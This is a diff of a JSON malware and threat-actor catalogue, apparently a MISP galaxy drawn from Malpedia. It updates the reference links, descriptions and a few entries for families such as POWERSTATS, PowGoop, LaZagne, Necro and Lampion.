"https://attack.mitre.org/groups/G0100/", + "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability", + "https://securelist.com/recent-cloud-atlas-activity/92016/", + "https://attack.mitre.org/groups/G0100", "https://unit42.paloaltonetworks.com/atoms/clean-ursa", - "https://securelist.com/recent-cloud-atlas-activity/92016", - "https://securelist.com/recent-cloud-atlas-activity/92016/" + "https://securelist.com/recent-cloud-atlas-activity/92016" ], "synonyms": [], "type": [] @@ -10496,9 +10967,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powersource", - "https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html", + "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", + "https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", - "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf" + "https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html" ], "synonyms": [], "type": [] @@ -10524,25 +10996,35 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerstats", - "http://www.secureworks.com/research/threat-profiles/cobalt-ulster", - "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/", "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", - "https://marcoramilli.com/2020/01/15/iranian-threat-actors-preliminary-analysis/", - "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/", - "https://unit42.paloaltonetworks.com/atoms/boggyserpens/", - "https://shells.systems/reviving-leaked-muddyc3-used-by-muddywater-apt/", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf", "https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/", - "https://www.secureworks.com/research/threat-profiles/cobalt-ulster", - "https://securelist.com/apt-trends-report-q2-2019/91897/", - "https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/", + "https://mp.weixin.qq.com/s/NN_iRvwA6yOHFS9Z3A0RBA", + "https://marcoramilli.com/2020/01/15/iranian-threat-actors-preliminary-analysis/", "https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a", - "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611", + "https://research.checkpoint.com/2019/the-muddy-waters-of-apt-attacks/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/", + "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/", "https://blog.prevailion.com/2020/01/summer-mirage.html", - "https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/" + "https://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater", + "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611", + "https://shells.systems/reviving-leaked-muddyc3-used-by-muddywater-apt/", + "https://sec0wn.blogspot.com/2017/10/continued-activity-targeting-middle-east.html", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a", + "https://sec0wn.blogspot.com/2018/02/burping-on-muddywater.html", + "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf", + "https://web.archive.org/web/20180807105755/https://www.sekoia.fr/blog/falling-on-muddywater/", + "https://www.group-ib.com/blog/muddywater/", + "http://www.secureworks.com/research/threat-profiles/cobalt-ulster", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf", + "https://unit42.paloaltonetworks.com/atoms/boggyserpens/", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html", + "https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/", + "https://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html", + "https://sec0wn.blogspot.com/2018/03/a-quick-dip-into-muddywaters-recent.html", + "https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/", + "https://www.secureworks.com/research/threat-profiles/cobalt-ulster" ], "synonyms": [ "Valyria" @@ -10557,13 +11039,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerton", - "https://www.symantec.com/security-center/writeup/2019-062513-4935-99", - "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html", - "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/", + "https://norfolkinfosec.com/apt33-powershell-malware/", "https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/", - "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", + "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/", "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", - "https://norfolkinfosec.com/apt33-powershell-malware/" + "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", + "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html", + "https://www.symantec.com/security-center/writeup/2019-062513-4935-99" ], "synonyms": [], "type": [] @@ -10598,7 +11080,7 @@ "value": "PowerWare" }, { - "description": "PowerZure is a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.", + "description": "PowerZure is a PowerShell project created to assess and exploit resources within Microsoft\u2019s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerzure", @@ -10615,6 +11097,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.power_magic", + "https://securelist.com/cloudwizard-apt/109722/", + "https://www.malwarebytes.com/blog/threat-intelligence/2023/05/redstinger", "https://securelist.com/bad-magic-apt/109087/?s=31" ], "synonyms": [], @@ -10628,18 +11112,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powgoop", - "https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf", - "https://www.cyberscoop.com/muddywater-iran-symantec-middle-east/", + "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html", "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf", "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611", "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf", "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/", - "https://www.security.ntt/blog/analysis-of-an-iranian-apts-e400-powgoop-variant", - "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html", "https://unit42.paloaltonetworks.com/thanos-ransomware/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/" + "https://www.cyberscoop.com/muddywater-iran-symantec-middle-east/", + "https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/", + "https://www.security.ntt/blog/analysis-of-an-iranian-apts-e400-powgoop-variant" ], "synonyms": [], "type": [] @@ -10652,8 +11136,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powruner", - "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2", - "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae" + "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae", + "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" ], "synonyms": [], "type": [] @@ -10679,10 +11163,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent", - "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html", - "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca", - "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/", "https://youtu.be/pBDu8EGWRC4?t=2492", + "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/", + "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca", + "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html", "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae" ], "synonyms": [], @@ -10709,9 +11193,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.roguerobin", + "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/", - "https://ironnet.com/blog/dns-tunneling-series-part-3-the-siren-song-of-roguerobin/", - "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca" + "https://ironnet.com/blog/dns-tunneling-series-part-3-the-siren-song-of-roguerobin/" ], "synonyms": [], "type": [] @@ -10719,6 +11203,19 @@ "uuid": "1e27a569-1899-4f6f-8c42-aa91bf0a539d", "value": "RogueRobin" }, + { + "description": "Toolkit downloader used by Royal Ransomware group, involving GnuPG for decryption.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.royal_ransom", + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1c75ffff-59f9-4fdc-958d-51f822f76c35", + "value": "Royal Ransom (Powershell)" + }, { "description": "", "meta": { @@ -10750,19 +11247,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.sload", - "https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy", - "https://www.cert-pa.it/notizie/campagna-sload-star-wars-edition-veicolata-via-pec/", - "https://blog.yoroi.company/research/the-sload-powershell-threat-is-expanding-to-italy/", "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf", - "https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html", + "https://www.certego.net/en/news/sload-hits-italy-unveil-the-power-of-powershell-as-a-downloader/", "https://cyware.com/news/new-sload-malware-downloader-being-leveraged-by-apt-group-ta554-to-spread-ramnit-7d03f2d9", "https://threatpost.com/sload-spying-payload-delivery-bits/151120/", - "https://blog.minerva-labs.com/sload-targeting-europe-again", "https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan", - "https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/", - "https://www.certego.net/en/news/sload-hits-italy-unveil-the-power-of-powershell-as-a-downloader/", + "https://www.microsoft.com/security/blog/2020/01/21/sload-launches-version-2-0-starslord/", "https://cert-agid.gov.it/news/campagna-sload-v-2-9-3-veicolata-via-pec/", - "https://www.microsoft.com/security/blog/2020/01/21/sload-launches-version-2-0-starslord/" + "https://blog.yoroi.company/research/the-sload-powershell-threat-is-expanding-to-italy/", + "https://www.cert-pa.it/notizie/campagna-sload-star-wars-edition-veicolata-via-pec/", + "https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html", + "https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/", + "https://blog.minerva-labs.com/sload-targeting-europe-again", + "https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy" ], "synonyms": [ "Starslord" @@ -10843,8 +11340,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.unidentified_002", - "https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-russian-govt-dissidents-with-cobalt-strike/", - "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/" + "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/", + "https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-russian-govt-dissidents-with-cobalt-strike/" ], "synonyms": [], "type": [] @@ -10870,6 +11367,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.vipersoftx", + "https://chris.partridge.tech/2022/evolution-of-vipersoftx-dga", "https://decoded.avast.io/janrubin/vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx/" ], "synonyms": [], @@ -10883,12 +11381,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wannamine", - "https://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/", - "https://www.cybereason.com/blog/wannamine-cryptominer-eternalblue-wannacry", + "https://news.sophos.com/fr-fr/2020/01/22/wannamine-meme-cybercriminels-veulent-avoir-mot-a-dire-sur-brexit/", "https://nakedsecurity.sophos.com/2018/01/31/what-are-wannamine-attacks-and-how-do-i-avoid-them/", - "https://www.crowdstrike.com/blog/weeding-out-wannamine-v4-0-analyzing-and-remediating-this-mineware-nightmare/", + "https://www.cybereason.com/blog/wannamine-cryptominer-eternalblue-wannacry", "https://www.accenture.com/_acnmedia/PDF-46/Accenture-Threat-Analysis-Monero-Wannamine.pdf", - "https://news.sophos.com/fr-fr/2020/01/22/wannamine-meme-cybercriminels-veulent-avoir-mot-a-dire-sur-brexit/" + "https://www.crowdstrike.com/blog/weeding-out-wannamine-v4-0-analyzing-and-remediating-this-mineware-nightmare/", + "https://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/" ], "synonyms": [], "type": [] @@ -10969,11 +11467,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.brickerbot", - "https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/", - "https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A", "https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/", + "https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/", "http://seclists.org/fulldisclosure/2017/Mar/7", + "https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A", "http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f", "https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/" ], @@ -11040,18 +11538,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.lazagne", - "https://github.com/AlessandroZ/LaZagne", - "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", "https://attack.mitre.org/groups/G0100/", + "https://www.infinitumit.com.tr/apt-35/", + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://edu.anarcho-copy.org/Against%20Security%20&%20%20Self%20Security/Group-IB%20RedCurl.pdf", + "https://attack.mitre.org/groups/G0100", + "https://github.com/AlessandroZ/LaZagne", + "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html", "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/", "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx", - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", - "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html", - "https://attack.mitre.org/groups/G0100", - "https://edu.anarcho-copy.org/Against%20Security%20&%20%20Self%20Security/Group-IB%20RedCurl.pdf", "https://www.mandiant.com/resources/blog/alphv-ransomware-backup", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", - "https://www.infinitumit.com.tr/apt-35/" + "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/" ], "synonyms": [], "type": [] @@ -11092,20 +11590,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.n3cr0m0rph", - "https://www.bleepingcomputer.com/news/security/freakout-malware-worms-its-way-into-vulnerable-vmware-servers/", - "https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/", - "https://twitter.com/xuy1202/status/1392089568384454657", - "https://www.lacework.com/blog/the-kek-security-network/", - "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/", - "https://www.lacework.com/blog/spytech-necro-keksecs-latest-python-malware/", - "https://www.lacework.com/keksec-tsunami-ryuk/", - "https://blogs.juniper.net/en-us/threat-research/necro-python-botnet-goes-after-vulnerable-visualtools-dvr", - "https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html", - "https://github.com/lacework/lacework-labs/tree/master/keksec", - "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/", "https://www.lacework.com/the-kek-security-network/", "https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/", - "https://twitter.com/xuy1202/status/1393384128456794116" + "https://www.lacework.com/blog/the-kek-security-network/", + "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/", + "https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/", + "https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html", + "https://www.bleepingcomputer.com/news/security/freakout-malware-worms-its-way-into-vulnerable-vmware-servers/", + "https://www.lacework.com/keksec-tsunami-ryuk/", + "https://twitter.com/xuy1202/status/1393384128456794116", + "https://github.com/lacework/lacework-labs/tree/master/keksec", + "https://blogs.juniper.net/en-us/threat-research/necro-python-botnet-goes-after-vulnerable-visualtools-dvr", + "https://twitter.com/xuy1202/status/1392089568384454657", + "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/", + "https://www.lacework.com/blog/spytech-necro-keksecs-latest-python-malware/" ], "synonyms": [ "FreakOut", @@ -11149,13 +11647,13 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/py.poet_rat", "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-stibnite/", "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html", - "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/", - "https://blog.talosintelligence.com/2020/10/poetrat-update.html", - "https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/", - "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", - "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", "https://securelist.com/apt-trends-report-q3-2020/99204/", - "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf" + "https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/", + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", + "https://blog.talosintelligence.com/2020/10/poetrat-update.html", + "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" ], "synonyms": [], "type": [] @@ -11181,11 +11679,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.pupy", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", - "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", - "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf", "https://github.com/n1nj4sec/pupy", - "https://www.secureworks.com/research/threat-profiles/cobalt-trinity" + "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", + "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf" ], "synonyms": [], "type": [] @@ -11197,6 +11695,7 @@ "description": "", "meta": { "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.pyaesloader", "https://malpedia.caad.fkie.fraunhofer.de/details/py.pyaesloader" ], "synonyms": [], @@ -11280,8 +11779,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.saphyra", - "https://www.youtube.com/watch?v=Bk-utzAlYFI", - "https://securityintelligence.com/dissecting-hacktivists-ddos-tool-saphyra-revealed/" + "https://securityintelligence.com/dissecting-hacktivists-ddos-tool-saphyra-revealed/", + "https://www.youtube.com/watch?v=Bk-utzAlYFI" ], "synonyms": [], "type": [] @@ -11294,8 +11793,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.serpent", - "https://www.bleepingcomputer.com/news/security/serpent-malware-campaign-abuses-chocolatey-windows-package-manager/", "https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain", + "https://www.bleepingcomputer.com/news/security/serpent-malware-campaign-abuses-chocolatey-windows-package-manager/", "https://blogs.vmware.com/security/2022/04/serpent-the-backdoor-that-hides-in-plain-sight.html" ], "synonyms": [], @@ -11335,8 +11834,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.stitch", - "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/", - "https://github.com/nathanlopez/Stitch" + "https://github.com/nathanlopez/Stitch", + "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/" ], "synonyms": [], "type": [] @@ -11348,6 +11847,7 @@ "description": "", "meta": { "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_002", "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_002" ], "synonyms": [], @@ -11360,6 +11860,7 @@ "description": "", "meta": { "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_003", "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_003" ], "synonyms": [], @@ -11386,8 +11887,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.venus_stealer", - "https://geekypandatales.wordpress.com/2023/02/19/the-infostealer-pie-python-malware-analysis/", - "https://twitter.com/0xToxin/status/1625435116771180546" + "https://twitter.com/0xToxin/status/1625435116771180546", + "https://geekypandatales.wordpress.com/2023/02/19/the-infostealer-pie-python-malware-analysis/" ], "synonyms": [], "type": [] @@ -11426,15 +11927,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.cageychameleon", - "https://vb2020.vblocalhost.com/conference/presentations/unveiling-the-cryptomimic/", "https://www.clearskysec.com/wp-content/uploads/2021/05/CryptoCore-Lazarus-Clearsky.pdf", - "https://cyberstruggle.org/delta/LeeryTurtleThreatReport_05_20.pdf", - "https://www.clearskysec.com/cryptocore-group/", - "https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds", + "https://vb2020.vblocalhost.com/conference/presentations/unveiling-the-cryptomimic/", + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/offshore%20APT%20organization/DangerousPassword/2020-04-02/Analysis.md", + "https://www.proofpoint.com/us/daily-ruleset-update-summary-20190314", "https://www.clearskysec.com/wp-content/uploads/2020/06/CryptoCore_Group.pdf", - "https://atlas-cybersecurity.com/cyber-threats/cryptocore-cryptocurrency-exchanges-under-attack/", + "https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds", + "https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/", + "https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html", + "https://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html", + "https://mp.weixin.qq.com/s/nnLqUBPX8xZ3hCr5u-iSjQ", + "https://threatbook.cn/ppt/The%2520Nightmare%2520of%2520Global%2520Cryptocurrency%2520Companies%2520-%2520Demystifying%2520the%2520%25E2%2580%259CDangerousPassword%25E2%2580%259D%2520of%2520the%2520APT%2520Organization.pdf", + "https://cyberstruggle.org/delta/LeeryTurtleThreatReport_05_20.pdf", "https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwjCk7uOzMP-AhXOYMAKHYtLCKkQFnoECBIQAQ&url=https%3A%2F%2Fi.blackhat.com%2FUSA-22%2FThursday%2FUS-22-Wikoff-Talent-Need-Not-Apply.pdf&usg=AOvVaw0deqd7ozZyRTfSBOBmlbiG", - "https://www.proofpoint.com/us/daily-ruleset-update-summary-20190314" + "https://atlas-cybersecurity.com/cyber-threats/cryptocore-cryptocurrency-exchanges-under-attack/", + "https://www.clearskysec.com/cryptocore-group/" ], "synonyms": [ "Cabbage RAT" @@ -11449,8 +11956,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.forbiks", - "https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2017-090807-0934-99", - "https://persianov.net/windows-worms-forbix-worm-analysis" + "https://persianov.net/windows-worms-forbix-worm-analysis", + "https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2017-090807-0934-99" ], "synonyms": [ "Forbix" @@ -11506,8 +12013,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.halfbaked", "https://attack.mitre.org/software/S0151/", - "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf" + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" ], "synonyms": [], "type": [] @@ -11549,15 +12056,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.lampion", - "https://research.checkpoint.com/wp-content/uploads/2019/12/Threat_Intelligence_News_2019-12-30.pdf", "https://seguranca-informatica.pt/the-hidden-c2-lampion-trojan-release-212-is-on-the-rise-and-using-a-c2-server-for-two-years", - "https://seguranca-informatica.pt/new-release-of-lampion-trojan-spreads-in-portugal-with-some-improvements-on-the-vbs-downloader", - "https://seguranca-informatica.pt/lampion-trojan-disseminated-in-portugal-using-covid-19-template/", - "https://seguranca-informatica.pt/trojan-lampion-is-back-after-3-months/", - "https://unit42.paloaltonetworks.com/single-bit-trap-flag-intel-cpu/", "https://cofense.com/blog/lampion-trojan-utilizes-new-delivery-through-cloud-based-sharing", - "https://seguranca-informatica.pt/targeting-portugal-a-new-trojan-lampion-has-spread-using-template-emails-from-the-portuguese-government-finance-tax/", - "https://securityaffairs.co/wordpress/128975/malware/hidden-c2-lampion-trojan-release-212.html" + "https://research.checkpoint.com/wp-content/uploads/2019/12/Threat_Intelligence_News_2019-12-30.pdf", + "https://seguranca-informatica.pt/trojan-lampion-is-back-after-3-months/", + "https://seguranca-informatica.pt/new-release-of-lampion-trojan-spreads-in-portugal-with-some-improvements-on-the-vbs-downloader", + "https://unit42.paloaltonetworks.com/single-bit-trap-flag-intel-cpu/", + 